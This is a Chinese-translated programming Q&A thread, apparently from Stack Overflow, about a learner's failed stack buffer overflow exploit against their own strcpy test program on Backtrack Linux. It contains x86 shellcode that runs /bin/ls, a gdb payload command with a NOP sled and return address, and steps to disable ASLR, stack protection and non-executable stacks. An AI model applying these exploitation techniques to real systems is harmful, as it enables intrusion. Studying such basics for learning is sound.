5

我正在尝试学习在 Backtrack Linux 上利用简单的缓冲流技术。

这是我的 C 程序

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if(argc==2)
    {

    strcpy(buffer, argv[1]);  //vulnerable function

    }

    return 0;
}

这是我使用的shellcode,对应简单的/bin/ls \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec \x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80

我使用以下命令将这个 shellcode 注入 gdb

run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')

当我逐步完成应用程序时,它会SIG FAULT根据最终ret指令生成。此时EIP正确设置为0xffffd30c。这个地址是可寻址的,并且包含一系列的NOP,后跟我的 shell 代码,如有效负载中所示。

我已禁用 ASLR sudo echo 0 > /proc/sys/kernel/randomize_va_space

fno-stack-protector并且还使用选项编译了我的二进制文件。

知道 SIGSEGV 的原因是什么吗?

4

2 回答 2

7

我已经回答了我自己的问题,问题是“可执行堆栈保护”,在堆栈内存中无法执行。这可以在 gcc 中禁用,如下所示

gcc -z execstack

于 2011-08-06T05:39:51.113 回答
0

您是否在 GCC (-fno-stack-protector) 中禁用了堆栈粉碎保护?

如何关闭 gcc 编译器优化以启用缓冲区溢出

于 2011-08-06T04:53:21.517 回答